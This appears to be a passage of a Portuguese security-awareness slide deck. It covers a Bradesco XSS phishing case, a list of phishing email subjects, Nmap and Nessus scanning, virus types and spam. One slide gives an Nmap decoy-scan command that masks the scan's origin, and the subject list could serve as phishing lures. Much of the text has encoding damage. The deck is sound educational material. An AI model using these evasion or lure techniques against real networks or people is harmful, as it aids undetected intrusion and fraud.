  • 143. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) Como ĂŠ demonstrado na imagem, a maioria dos navegadores e os programas de e-mails nĂŁo exibem o endereço completo de uma URL, se esta for muito extensa, nĂŁo permitindo que a existĂŞncia do golpe seja percebida. Embora o e-mail tenha usado uma tĂŠcnica refinada que facilmente poderia enganar atĂŠ mesmo usuĂĄrios com certa experiĂŞncia, devido ao link camuflado, erros de ortografia caracterĂ­sticos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-mail em massa usado pelos criminosos nĂŁo era compatĂ­vel com caracteres especiais, como acentos. 143
  • 144. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) XSS Cross Site Scripting, ou XSS, ĂŠ um tipo de vulnerabilidade onde determinada pĂĄgina de internet nĂŁo filtra suficientemente as informaçþes enviadas pelo navegador web, sendo possĂ­vel fazĂŞ-la exibir conteĂşdos de outros sites, ou conteĂşdos especificados no prĂłprio link ou outra informação. Um exemplo clĂĄssico ĂŠ a pĂĄgina de busca. Em geral, pĂĄginas de buscas exibem na tela a informação que estĂĄ sendo procurada (por exemplo, “VocĂŞ estĂĄ procurando por: [termo de pesquisa]“). Se a exibição desta informação nĂŁo for filtrada corretamente, a informação, em vez de exibida, serĂĄ interpretada como cĂłdigo HTML pelo navegador, possibilitando o ataque. FĂłruns, livros de visitas e blogs (este Ăşltimo, devido Ă  função de comentĂĄrios) podem ser vĂ­timas do XSS permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetarĂĄ qualquer usuĂĄrio que o ver. Este ĂŠ o ataque de XSS persistente, ou tipo 2. O Bradesco foi alvo do XSS impermanente ou nĂŁo-persistente, tambĂŠm chamado de XSS tipo 1. O objetivo de ataques XSS ĂŠ geralmente roubar informaçþes importantes da vĂ­tima, tais como os cookies de autenticação. PorĂŠm, XSS tambĂŠm pode ser usado para alterar os sites e usar da confiança depositada pelo internauta na pĂĄgina para persuadi-lo a enviar informaçþes sigilosas, ou para rodar cĂłdigo malicioso nos PCs de visitantes. A Linha Defensiva jĂĄ noticiou a respeito de brechas semelhantes no YouTube e no Orkut. Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-mail 144 e similares nĂŁo sejam clicados, a nĂŁo ser quando estava-se esperando absolutamente o e-mail em questĂŁo (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que possĂ­vel, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o que foi indicado no e-mail. Brechas de XSS tipo 2 sĂŁo difĂ­ceis de serem evitadas pelo usuĂĄrio, sendo a responsabilidade do site nesses casos ainda maior, embora, em Ăşltima instância, a responsabilidade sempre seja do site.
  • 145. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) Ao acessar o link, o internauta era direcionado para uma pĂĄgina do Bradesco (Index_Pesquisa.asp) que, vulnerĂĄvel a XSS, carregava outra pĂĄgina, hospedada em um domĂ­nio brasileiro (cujo nome nĂŁo foi divulgado por se tratar de um domĂ­nio legĂ­timo comprometido). Em ataques XSS, pĂĄginas legĂ­timas sĂŁo usadas de forma maliciosa e um cĂłdigo (no caso acima, um FRAMESET1) ĂŠ inserido na pĂĄgina legĂ­tima. O conteĂşdo da pĂĄgina serĂĄ, portanto, diferente do esperado. 145
  • 146. Lista de Hackers fornecida: ¨ Amores On-line - cartĂŁo virtual - Equipe Carteiro Romântico - Uma pessoa que lhe admira enviou um cartĂŁo ¨ As fotos que eu tinha prometido. Álbum pessoal de fotos ¨ AVG AntivĂ­rus - Detectamos que seu E.Mail estĂĄ enviando mensagens contaminadas com o vĂ­rus w32. bugbear ¨ Aviso - vocĂŞ estĂĄ sendo traĂ­do - veja as fotos ¨ Aviso - vocĂŞ estĂĄ sendo traĂ­do - veja as imagens do motel ¨ Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados - Contrato Pendente - Clique para fazer atualização ¨ Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a promoçþes exclusivas? Clique na fechadura ¨ Câmara dos Dirigentes Lojistas - SPC - Serviço de Proteção ao CrĂŠdito - Notificação - PendĂŞncias Financeiras - Baixar o arquivo de relatĂłrio de pendĂŞncias. ¨ carnaval 2005 - veja o que rolou nos bastidores do carnaval de SĂŁo Paulo ¨ CartĂŁo Terra - eu te amo - webcard enviado atravĂŠs do site CartĂľes Terra ¨ CartĂŁo UOL - I love you - vocĂŞ recebeu um cartĂŁo musical - Para visualizar e ouvir escolha uma das imagens ¨ CartĂľes BOL - VocĂŞ recebeu um cartĂŁo BOL ¨ CartĂľesnico.com - Seu amor criou um cartĂŁo para vocĂŞ ¨ Checkline - Consultas de crĂŠdito on-line - Consultas no Serasa/SPC ¨ Claro IdĂŠias - Grande chance de ganhar meio milhĂŁo de reais em ouro e 18 carros ¨ Colaneri e Campos Ltda - Ao Gerente de Vendas - orçamento de material e equipamentos em urgĂŞncia
  • 147. Lista de Hackers fornecida: ¨ Correio Virtual - hi5 - Seu Amor te enviou este cartĂŁo ¨ CPF cancelado ou pendente de regularização - verifique; seu CPF estĂĄ cancelado ¨ Declaração de Imposto de Renda de 2005/06 - MinistĂŠrio da Fazenda - CPF Cancelado ou Pendente de Regularização ¨ Ebay - your account could be suspended - Billing Department ¨ Embratel - Comunicado de Cobrança - Aviso de Bloqueio ¨ Embratel - Notificação Confidencial - Fatura de serviços prestados Clique para detalhamento da fatura ¨ Emotion Cards - UOL - ParabĂŠns vocĂŞ recebeu um Presente Virtual ¨ Febraban - Guia de Segurança - Febrasoft Security ¨ Finasa - Nossa Caixa - Fraudes BancĂĄrias - Febraban ¨ Fininvest - dĂŠbito em atraso - pendĂŞncias financeiras em seu CPF/CNPJ ¨ Ganhe uma viagem a Paris - Guia Paris LumiĂŠre ¨ Gmail - Gmail Amigo Oculto - Baixar FormulĂĄrio - E-mail de 1 Giga ¨ Humortadela - Piada animada sempre amigos ¨ Humortadela - vocĂŞ ĂŠ 10 - acesse o link e sacaneie ¨ Humortadela - vocĂŞ recebeu uma piada animada - Ver Piada Animada ¨ Ibest - acesso grĂĄtis e fĂĄcil - discador ibest - 0800 conexĂŁo sem pulso telefĂ´nico. GrĂĄtis - Download ¨ Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vĂ­deo ¨ Leiam esta informação IMPORTANTe ¨ Martins Com Ltda - Setor de Compras - Orçamento ¨ Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento nĂŁo for quitado acionaremos departamento jurĂ­dico
  • 148. Lista de Hackers fornecida: ¨ OlĂĄ, hĂĄ quanto tempo! Eu me mudei para os Estados Unidos, e perdemos contato... ¨ Olha o que a Globo preparou para vocĂŞ neste ano de 2005 - Big Brother Brasil 5 - Baixe o vĂ­deo ¨ Overture - Promoção para novos assinantes - Tem cliente procurando, tem vocĂŞ oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar ¨ Paparazzo - globo. com - se vocĂŞ gostou de uma espiada no vĂ­deo ¨ Parperfeito - VocĂŞ foi adicionado aos prediletos - Associado do Par Perfeito ¨ Passe Livre de 7 dias no Globo Media Center ¨ Promoção Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu fotolog e concorra ¨ Radio Terra - dedique uma mĂşsica ¨ Receita Federal - CPF cancelado ou pendente de regularização ¨ Saudades de vocĂŞ - Sou alguĂŠm que te conheceu hĂĄ muito tempo, e tive que fazer uma viagem - Espero que goste das fotos ¨ SERASA - pendĂŞncias referentes a seu nome - Extrato de dĂŠbito ¨ SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dĂŠbitos ¨ Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mĂŁo ¨ Sou um amigo seu - vocĂŞ estĂĄ sendo traĂ­do - veja as fotos ¨ Symantec - Faça sua atualização do Norton 2005 aqui - Gratuita - Licença para 1 ano grĂĄtis ¨ Terra CartĂľes - O meu melhor presente ĂŠ vocĂŞ ¨ Tim pĂłs pago - pendĂŞncias no SPC - Sistema de Proteção aoCrĂŠdito - Serial do Celular
  • 149. Lista de Hackers fornecida: ¨ Microsoft - Ferramenta de remoção de softwares Mal-Intencionados do Microsoft Windows - Windows XP fica a cara de quem recebe um cartĂŁo Voxcards ¨ Microsoft Software - Este conteĂşdo foi testado e ĂŠ fornecido a vocĂŞ pela Microsoft Corporation - Veja as novidades ¨ Music Cards - Confirmação ¨ Necktsun ComĂŠrcio Ltda - Palmas - Departamento de Vendas - Orçamento ¨ Netcard CartĂľes Virtuais - Emoçþes de verdade ¨ Norton AntivĂ­rus - Alerta de Segurança - download do antĂ­doto para o Ms. Bruner ¨ Notificação Confidencial - PendĂŞncias Financeiras em seu CPF ¨ O carteiro - vocĂŞ recebeu um cartĂŁo de quem te admira ¨ O carteiro. com - tenho uma novidade para vocĂŞ - veja o cartĂŁo que preparei ¨ Voxcards - cartĂŁo voxcards - para quem vocĂŞ vai mandar um cartĂŁo hoje? ¨ Voxcards - mensageiro - vocĂŞ estĂĄ recebendo um cartĂŁo virtual voxcards - Precisa instalar o plugin - clique para instalar ¨ Webcard Terra - Feliz Dia das MĂŁes - Existe um presente especial esperando por vocĂŞ no site de cartĂľes do terra. ¨ Week - Complimentary Subscription Confirmation - Free - Please Apply online - PC Week ¨ www. symantec. com - A solução AntivĂ­rus mais confiĂĄvel do mundo ¨ www.microsoft. com - Proteja seu computador com antivĂ­rus
  • 150. Lista de Hackers fornecida: ¨ UOL - Promoção Cultural - Cara cadĂŞ meu carro ¨ UOL CartĂľes - Estou com saudades - clique para visualizar ¨ UOL CartĂľes - Seu amor lhe enviou um cartĂŁo - clique para baixar ¨ UOL CartĂľes - VocĂŞ recebeu um lindo cartĂŁo virtual ¨ Veja as fotos proibidas das musas do bbb5 ¨ Viagens contaminadas com o w32. bugbear ¨ Virtual Cards - Um grande abraço da equipe virtual cards - ler cartĂŁo ¨ VIVO - Torpedos Web Gratuito - Torpedo FĂĄcil Vivo ¨ Yahoo CartĂľes - VocĂŞ ĂŠ tudo para mim - clique na imagem ¨ Yahoo CartĂľes - VocĂŞ ĂŠ tudo para mim - enviado por quem te admira ¨ Outra dica importante: nunca abra E-Mails de remetentes desconhecidos! ¨ Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc... ¨ E, finalmente, para ter certeza que ĂŠ de um golpe que vocĂŞ estĂĄ sendo vĂ­tima, passe o mouse - sem clicar - pela palavra do direcionamento : vocĂŞ vai ver, na barra inferior - Ă  esquerda da tela -, que se trata de um arquivo com a terminação 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vĂŁo) espionar seu computador, roubando seus dados, senhas, etc.
  • 151. Symantec: relatĂłrio mapeia mercado negro de dados ¨ Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O relatĂłrio traz o preço das informaçþes negociadas por criminosos e mostra como as empresas podem ter prejuĂ­zos com a vulnerabilidade dos dados dos clientes. Segundo Marcelo Silva, diretor de serviços da companhia no Brasil, jĂĄ existe um ecossistema criado em torno do roubo de dados. “Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe ĂŠ um grande mercado”, afirma o executivo. Veja tabela com o preço dos dados no mercado negro: ¨ Produto Preço Contas bancĂĄrias de 10 dĂłlares a mil dĂłlares CartĂľes de crĂŠdito de 0,40 dĂłlar a 20 dĂłlares Identidades completas de 1 dĂłlar a 15 dĂłlares Contas do eBay de 1 dĂłlar a 18 dĂłlares Senhas de e-mail de 4 dĂłlares a 30 dĂłlares Proxies de 1,5 dĂłlar a 30 dĂłlares CW Connect - No grupo de discussĂŁo sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informação e telecomunicaçþes do mercado, uma das participantes - a analista Fabiana - inseriu uma pesquisa sobre as principais ameaças Ă s informaçþes da empresa: ¨ 1 - VĂ­rus 75% (Por falta de conhecimento os usuĂĄrios baixam programas sem conhecimento, acessam sites suspeitos, etc) 2 - Divulgação de senhas 57% 3 - Hackers 44% 4 - FuncionĂĄrios insatisfeitos 42% 5 - Acessos indevidos 40% 6 - Vazamento de informaçþes 33%
  • 152. 152
  • 153. TĂŠcnicas para Alcançar os Objetivos da Segurança ¨Deve-se perguntar: 153 – Proteger O QUÊ? – Proteger DE QUEM? – Proteger A QUE CUSTOS? – Proteger COM QUE RISCOS? ¨O axioma da segurança ĂŠ bastante conhecido de todos, mas ĂŠ verdadeiro: – "Uma corrente nĂŁo ĂŠ mais forte do que o seu elo mais fraco"
  • 154. 154 Custo de Segurança:
  • 155. 155 Custo Visiveis x Invisiveis:
  • 156. AA mmaaiioorriiaa ddooss aattaaqquueess aaccoonntteeccee aaqquuii PPrroodduuttoo LLaannççaaddoo VVuullnneerraabbiilliiddaaddee ddeessccoobbeerrttaa FFiixx ddiissppoonnĂ­Ă­vveell FFiixx iinnssttaallaaddoo ppeelloo cclliieennttee Atualização do ambiente Quando as ameaças ocorrem?
  • 157. Atualização do ambiente Tempo para a invasĂŁo diminuindo PPrroodduuttoo LLaannççaaddoo InvasĂŁo O tempo (em dias) entre a disponibilização VVuullnneerraabbiilliiddaaddee ddeessccoobbeerrttaa da correção e a FFiixx ddiissppoonnĂ­Ă­vveell FFiixx iinnssttaallaaddoo ppeelloo cclliieennttee invasĂŁo tem diminuĂ­do, portanto a aplicação de “patches” nĂŁo pode ser a Ăşnica defesa em grandes empresas 18 151 0 331 BBllaassttee rr WWeellcchhii aa// NNaacchhii NNiimmdd aa 25 SSQQLL SSllaammmm eerr 14 SSaasssseerr
  • 158. Atualização do ambiente Worm Zotob ¨ 09/08 - A Microsoft publica a correção ¨ 11/08 - A Microsoft informa que um ataque estĂĄ na eminencia de acontecer sobre essa vulnerabilidade ¨ 17/08 - CNN e ABC sĂŁo atacadas
  • 159. Principais Ameaças 9ÂŞ edição da Pesquisa Nacional de Segurança da Informação da MĂłdulo Security
  • 160. Principais ObstĂĄculos 9ÂŞ edição da Pesquisa Nacional de Segurança da Informação da MĂłdulo Security
  • 161. AnĂĄlise de Segurança 161 ¨ SĂŁo falhas em serviços, aplicativos e sistemas operacionais que pode acarretar acesso ao sistemas parcial ou total em nĂ­vel de administração. ¨ Hoje temos ferramentas de escaneamento de vulnerabilidades que detecta falhas de sistemas, mais tambĂŠm sĂŁo utilizadas para invasĂŁo. ¨ Segundo o site sectools.org temos as 10 principais ferramentas de escaneamento de vulnerabilidades de sistemas. – Nessus, GFI LANguard, Retina, Core Impact, ISS Internet Scanner, X-scan, Sara, QualysGuard, SAINT, MBSA
  • 162. 162 Soluçþes para a Insegurança InformĂĄtica ¨NMAP - É uma ferramenta para exploração de rede criada pelo Fyodor. É uma das ferramentas mais importantes para engenharia de segurança ou pen-tester. Com ele vocĂŞ poderĂĄ entrar em uma rede e buscar serviços que estĂŁo escutando em cada porta especifica. VocĂŞ pode fazer um varredura de tcp()connect que farĂĄ uma conexĂŁo completa com o host ou uma syn scan que farĂĄ uma simples conexĂŁo que servirĂĄ para testar regras de firewall por exemplo.
  • 163. 163 Soluçþes para a Insegurança InformĂĄtica ¨NMAP (I) Alvo: MS-Windows 95 modificado
  • 164. 164 Soluçþes para a Insegurança InformĂĄtica ¨NMAP (II) Alvo: Linux Mandrake modificado
  • 165. 165 Soluçþes para a Insegurança InformĂĄtica ¨NMAP (comandos) Um rastreio(scan) tĂ­pico do Nmap ĂŠ mostrado em Example 1, “Uma amostra de rastreio(scan) do Nmap”. Os Ăşnicos argumentos que o Nmap utiliza nesse exemplo sĂŁo -A para permitir a detecção de SO e a versĂŁo -T4 para execução mais rĂĄpida e os nomes de anfitriĂŁo(hostnames) de dois alvos.
  • 166. 166 Soluçþes para a Insegurança InformĂĄtica ¨NMAP (comandos - Ubuntu) Version detection: ApĂłs as portas TCP e/ou UDP serem descobertas por algum dos mĂŠtodos, o nmap irĂĄ determinar qual o serviço estĂĄ rodando atualmente. O arquivo nmap-service- probes ĂŠ utilizado para determinar tipos de protocolos, nome da aplicação, nĂşmero da versĂŁo e outros detalhes
  • 167. 167 Soluçþes para a Insegurança InformĂĄtica ¨NMAP (comandos - Ubuntu) D <decoy1,[decoy2],[SEU_IP]...> Durante uma varredura, utiliza uma sĂŠrie de endereços falsificados, simulando que o scanning tenha originado desses vĂĄrios hosts, sendo praticamente impossĂ­vel identificar a verdadeira origem da varredura. sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP 192.168.0.1
  • 168. 168 Soluçþes para a Insegurança InformĂĄtica ¨ AnĂĄlise de Segurança – MĂŠtodo de detecção remota de vulnerabilidades • Aplicaçþes como o NMAP nĂŁo tiram conclusĂľes • Existe outro tipo de aplicação que efectua o levantamento remoto de recursos, detecta vulnerabilidades, alerta o utilizador ou lança ataques – NESSUS (Nessus Security Scanner) • É uma ferramenta sofisticada que funciona de forma semi-automĂĄtica • Pode ser usada para obter relatĂłrios de segurança informĂĄtica • TambĂŠm pode ser utilizada para “atacar “ uma plataforma • Incorpora ataques de negação de serviço, teste de exploits, etc • Facilita muito a actividade dos crackers
  • 169. 169 Soluçþes para a Insegurança InformĂĄtica ¨NESSUS - AtĂŠ hĂĄ pouco tempo o Nessus sĂł funcionava no Linux, mas recentemente foi lançado o Nessus para Windows. É uma excelente ferramenta designada para testar e descobrir falhas de segurança (portas, vulnerabilidades, exploits) de uma ou mais mĂĄquinas. - Estas falhas ou problemas podem ser descobertos por um grupo hacker, um Ăşnico hacker, uma empresa de segurança ou pelo prĂłprio fabricante, podendo ser de maneira acidental ou proposital, O Nessus ajuda a identificar e resolver estes problemas antes que alguĂŠm tire vantagem destes com propĂłsitos maliciosos.
  • 170. 170 Soluçþes para a Insegurança InformĂĄtica ¨NESSUS Alvo: Linux SuSE Detectando Nmap
  • 171. 171 Soluçþes para a Insegurança InformĂĄtica ¨NESSUS Alvo: MS-Windows 95 Detectando Nmpa
  • 172. 172 Soluçþes para a Insegurança InformĂĄtica ¨NESSUS Alvo: Linux RedHat apĂłs instalação
  • 173. 173 Soluçþes para a Insegurança InformĂĄtica ¨NESSUS Verificação da pĂłpria mĂĄquina
  • 174. Soluçþes para a Insegurança InformĂĄtica ¨NESSUS - Report
  • 175. Soluçþes para a Insegurança InformĂĄtica ¨NESSUS – Report com formato HTML
  • 177. Tipos de Virus ¨ VĂ­rus de Boot Um dos primeiros tipos de vĂ­rus conhecido, o vĂ­rus de boot infecta a partição de inicialização do sistema operacional. Assim, ele ĂŠ ativado quando o computador ĂŠ ligado e o sistema operacional ĂŠ carregado. ¨ Time Bomb Os vĂ­rus do tipo "bomba de tempo" sĂŁo programados para se ativarem em determinados momentos, definidos pelo seu criador. Uma vez infectado um determinado sistema, o vĂ­rus somente se tornarĂĄ ativo e causarĂĄ algum tipo de dano no dia ou momento previamente definido. Alguns vĂ­rus se tornaram famosos, como o "Sexta-Feira 13" e o "Michelangelo". Minhocas, worm ou vermes Com o interesse de fazer um vĂ­rus se espalhar da forma mais abrangente possĂ­vel, seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos usuĂĄrios infectados e passaram a programar seus vĂ­rus de forma que apenas se repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, seus autores visam tornar suas criaçþes mais conhecidas na Internet. Este tipo de vĂ­rus passou a ser chamada de verme ou worm. Eles estĂŁo mais aperfeiçoados, jĂĄ hĂĄ uma versĂŁo que ao atacar a mĂĄquina hospedeira, nĂŁo sĂł se replica, mas tambĂŠm se propaga pela internet pelos e-mail que estĂŁo registrados no cliente de e-mail, infectando as mĂĄquinas que abrirem aquele e-mail, reiniciando o ciclo
  • 178. Tipos de Virus (cont) ¨ Trojans ou cavalos de TrĂłia Certos vĂ­rus trazem em seu bojo um cĂłdigo a parte, que permite a um estranho acessar o micro infectado ou coletar dados e enviĂĄ-los pela Internet para um desconhecido, sem notificar o usuĂĄrio. Estes cĂłdigos sĂŁo denominados de Trojans ou cavalos de TrĂłia. Inicialmente, os cavalos de TrĂłia permitiam que o micro infectado pudesse receber comandos externos, sem o conhecimento do usuĂĄrio. Desta forma o invasor poderia ler, copiar, apagar e alterar dados do sistema. Atualmente os cavalos de TrĂłia agora procuram roubar dados confidenciais do usuĂĄrio, como senhas bancĂĄrias. Os vĂ­rus eram no passado, os maiores responsĂĄveis pela instalação dos cavalos de TrĂłia, como parte de sua ação, pois eles nĂŁo tĂŞm a capacidade de se replicar. Atualmente, os cavalos de TrĂłia nĂŁo mais chegam exclusivamente transportados por vĂ­rus, agora sĂŁo instalados quando o usuĂĄrio baixa um arquivo da Internet e o executa. PrĂĄtica eficaz devido a enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usuĂĄrios. Tais e-mails contĂŠm um endereço na Web para a vĂ­tima baixar o cavalo de TrĂłia, ao invĂŠs do arquivo que a mensagem diz ser. Esta prĂĄtica se denomina phishing,expressĂŁo derivada do verbo to fish, "pescar" em inglĂŞs. Atualmente, a maioria dos cavalos de TrĂłia visam sites bancĂĄrios, "pescando" a senha digitada pelos usuĂĄrios dos micros infectados. HĂĄ tambĂŠm cavalos de TrĂłia que ao serem baixados da internet "guardados" em falsos programas ou em anexos de e-mail, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt dĂĄ as "regras do jogo": os dados foram "seqĂźestrados" e sĂł serĂŁo "libertados" mediante pagamento em dinheiro para uma determinada conta bancĂĄria, quando serĂĄ fornecido o cĂłdigo restaurador. TambĂŠm os cavalos de trĂłia podem ser usados para levar o usuĂĄrio para sites falsos, onde sem seu conhecimento, serĂŁo baixados trojans para fins criminosos, como aconteceu com os links do google, pois uma falha de segurança poderia levar um usuĂĄrio para uma pĂĄgina falsa. Por este motivo o serviço esteve fora do ar por algumas horas para corrigir esse bug, pois caso contrĂĄrio as pessoas que nĂŁo distinguissem o site original do falsificado seriam afetadas. ¨ Hijackers Hijackers sĂŁo programas ou scripts que "sequestram" navegadores de Internet, principalmente o Internet Explorer. Quando isso ocorre, o hijacker altera a pĂĄgina inicial do browser e impede o usuĂĄrio de mudĂĄ-la, exibe propagandas em pop-ups ou janelas novas, instala barras de ferramentas no navegador e podem impedir acesso a determinados sites (como sites de software antivĂ­rus, por exemplo).
  • 179. Tipos de Virus (cont) ¨ VĂ­rus no Orkut Em torno de 2006 e 2007 houve muitas ocorrĂŞncias de vĂ­rus no Orkut que ĂŠ capaz de enviar scraps (recados) automaticamente para todos os contatos da vĂ­tima na rede social, alĂŠm de roubar senhas e contas bancĂĄrias de um micro infectado atravĂŠs da captura de teclas e cliques. Apesar de que aqueles que receberem o recado precisam clicar em um link para se infectar, a relação de confiança existente entre os amigos aumenta muito a possibilidade de o usuĂĄrio clicar sem desconfiar de que o link leva para um worm. Ao clicar no link, um arquivo bem pequeno ĂŠ baixado para o computador do usuĂĄrio. Ele se encarrega de baixar e instalar o restante das partes da praga, que enviarĂĄ a mensagem para todos os contatos do Orkut. AlĂŠm de simplesmente se espalhar usando a rede do Orkut, o vĂ­rus tambĂŠm rouba senhas de banco, em outras palavras, ĂŠ um clĂĄssico Banker. ¨ Keylogger O KeyLogger ĂŠ uma das espĂŠcies de vĂ­rus existentes, o significado dos termos em inglĂŞs que mais se encaixa no contexto seria: Capturador de teclas . Ao serem executados, normalmente os keyloggers ficam escondidos no sistema operacional, sendo assim a vĂ­tima nĂŁo tem como saber que estĂĄ sendo monitorada. Atualmente os keyloggers sĂŁo desenvolvidos para meios ilĂ­citos, como por exemplo roubo de senhas bancĂĄrias. SĂŁo utilizados tambĂŠm por usuĂĄrios com um pouco mais de conhecimento para poder obter senhas pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers que capturam a tela da vĂ­tima, sendo assim, quem implantou o keylogger tem controle sobre o que a pessoa estĂĄ fazendo no computador. ¨ Estado Zumbi O estado zumbi em um computador ocorre quando ĂŠ infectado e estĂĄ sendo controlado por terceiros. Podem usĂĄ-lo para disseminar, vĂ­rus , keyloggers, e procededimentos invasivos em geral. Usualmente esta situação ocorre pelo fato da mĂĄquina estar com seu Firewall e ou Sistema Operacional desatualizados. Segundo estudos na ĂĄrea, um computador que estĂĄ na internet nessas condiçþes tem quase 50% de chance de se tornar uma mĂĄquina zumbi, que dependendo de quem estĂĄ controlando, quase sempre com fins criminosos, como acontece vez ou outra, quando crackers sĂŁo presos por formar exĂŠrcitos zumbis para roubar dinheiro das contas correntes e extorquir.
  • 180. Tipos de Virus (cont) ¨ VĂ­rus de E-mail AtĂŠ pouco tempo atrĂĄs nĂŁo existiam vĂ­rus de E-mail e todos os textos que circulavam sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se propagam por mails e nĂŁo necessitam que se execute qualquer programa anexado ou nĂŁo a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia. KakWorm : SĂł ataca as versĂľes inglesa e francesa do Outlook. Para que a contaminação aconteça basta que uma mensagem contaminada seja exibida no “painel de visualização”, sem necessidade de abrir o mail. AlĂŠm de sua autopropagação, o principal efeito consiste no desligamento do computador. Ele se aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as mensagens levarĂŁo consigo o KakWorm. Todo primeiro dia do mĂŞs, Ă s17hs, ĂŠ apresentada a mensagem: “Kagou-Anti-Kro$oft says not today!”. Em seguida, o computador ĂŠ desligado. Romeu e Julieta : Ataca os computadores que usam as versĂľes 4.0, 4.01, 5.0, e 5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98, Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa instabilidades no computador contaminado. Uma caracterĂ­stica desse worm ĂŠ que o assunto (subject) da mensagem que contĂŠm o vĂ­rus varia e ĂŠ selecionado aleatoriamente entre os seguintes: Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? - lol :) - ,,,… - !!! - newborn - merry christmas! - surprise ! - Caution: NEW VIRUS ! - scandal ! - ^_^ - Re: - Romeo&Juliet - <> :)))))) - hello world - !!??!?!? - subject - ble bla, bee - I Love You ;) - sorry… - Hey you ! - Matrix has you… - my picture from shake-beer Davinia: É capaz de contaminar e de autopropagar-se sem a existĂŞncia de um arquivo anexado Ă  mensagem, danifica todos os arquivos .html e os deixa irrecuperĂĄveis.
  • 181. Tipos de Virus (cont) ¨ VĂ­rus de macro Quando se usa alguns programas, por exemplo um editor de texto, e necessita-se executar uma tarefa repetidas vezes em seqßência (por exemplo substituir todos os “eh” por “é”) pode-se editar um comando Ăşnico para efetuĂĄ-las. Esse comando ĂŠ chamado de macro, que pode ser salvo em um modelo para ser aplicado em outros arquivos. AlĂŠm dessa opção da prĂłpria pessoa fazer um modelo os comandos bĂĄsicos dos editores de texto tambĂŠm funcionam com modelos. Os vĂ­rus de macro atacam justamente esses arquivos comprometendo o funcionamento do programa. Os alvos principais sĂŁo os prĂłprios editores de texto (Word) e as planilhas de cĂĄlculo (Excel). A disseminação desse tipo de vĂ­rus ĂŠ muito mais acentuada pois documentos sĂŁo muito mĂłveis e passam de mĂĄquina em mĂĄquina . Ao escrever, editar ou, simplesmente, ler arquivos vindos de computadores infectados a contaminação ocorre. Assim, verdadeiras “epidemias” podem acontecer em pouco tempo. AlĂŠm disso, os macrovĂ­rus constituem a primeira categoria de vĂ­rus multiplataforma, ou seja, nĂŁo se limitam aos computadores pessoais, podendo infectar tambĂŠm outras plataformas que usem o mesmo programa, como o Macintosh, por exemplo.
  • 182. Phishing scam ¨ Bastante comum, esse tipo de golpe virtual ĂŠ baseado no envio de e-mails sugerindo que os internautas baixem arquivos ou visitem sites maliciosos. Outra possibilidade para enganar os usuĂĄrios da web ĂŠ a oferta de links, tambĂŠm para pĂĄginas fraudulentas, em variados sites, blogs e redes sociais. Quando aceitam a sugestĂŁo dos piratas, abrindo os arquivos ou visitando esses endereços, as vĂ­timas em potencial podem infectar seus computadores involuntariamente com programas maliciosos. Geralmente, essas pragas instaladas na mĂĄquina tĂŞm como objetivo roubar informaçþes pessoais dos usuĂĄrios de internet. 182
  • 184. 184
  • 185. O que significa SPAM ¨ O termo SPAM origina-se de um programa de sĂŠrie inglesa de comĂŠdia onde os clientes pediam repetidamente “SPAM”, marca de um presunto enlatado americano. ¨ Na informĂĄtica significa enviar mensagens para qualquer quantidade de usuĂĄrios, sem obter prĂŠvia autorização.
  • 186. Como Evitar SPAM ¨ Existem diversas formas de bloqueio de mensagens nĂŁo solicitadas. VĂĄrios programas fazem esse serviço, como por exemplo, o SPAM Assassin. SĂŁo configurados para bloquear as mensagens vindas de endereços conhecidos que disseminam essas mensagens. Bloqueia-se tambĂŠm as mensagens contendo alguma palavra ou expressĂŁo especĂ­fica, por exemplo: ¨ “Compre um notebook” ¨ “Troque seus cartuchos de impressoras” ¨ “Free teen images”
  • 187. ataque-servidor 6% ataque-usuario 4% axfr 32% spam 24% scan 30% dos 1% fraude invasao 0% 3%
  • 188. 188 Posso enviar um vĂ­rus por brincadeira? NĂŁo! Mesmo por brincadeira, enviar um vĂ­rus de computador pode configurar crime de dano. Certifique-se que os anexos transmitidos sĂŁo arquivos benignos e Ăşteis ao destinatĂĄrio. CĂłdigo Penal Dano Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia: Pena - detenção, de um a seis meses, ou multa. Um vĂ­rus pode se propagar de diversas formas.  anexo  download  engenharia social
